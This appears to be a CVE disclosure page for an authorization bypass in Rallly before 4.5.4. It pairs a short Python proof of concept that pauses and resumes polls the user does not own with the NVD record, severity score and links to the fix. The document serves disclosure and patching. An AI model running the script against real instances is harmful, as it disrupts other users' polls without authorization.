CVE-2025-65033

import requests # CVE-2025-65033 PoC - Rallly Authorization Bypass # Any authenticated user can pause/resume any poll TARGET_URL = "https://your-rallly-instance.com" POLL_ID = "target-poll-id-here" # Public poll ID from share link SESSION_TOKEN = "your-authenticated-session-token" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Pause any poll (regardless of ownership) pause_url = f"{TARGET_URL}/api/polls/{POLL_ID}/pause" response = requests.post(pause_url, headers=headers) print(f"Pause request status: {response.status_code}") print(f"Response: {response.text}") # Resume any poll (regardless of ownership) resume_url = f"{TARGET_URL}/api/polls/{POLL_ID}/resume" response = requests.post(resume_url, headers=headers) print(f"Resume request status: {response.status_code}") print(f"Response: {response.text}") # Note: No ownership verification is performed on the server side

{"cve": {"id": "CVE-2025-65033", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:51.107", "lastModified": "2025-11-24T18:02:25.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the poll management feature allows any authenticated user to pause or resume any poll, regardless of ownership. The system only uses the public pollId to identify polls, and it does not verify whether the user performing the action is the poll owner. As a result, any user can disrupt polls created by others, leading to a loss of integrity and availability across the application. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}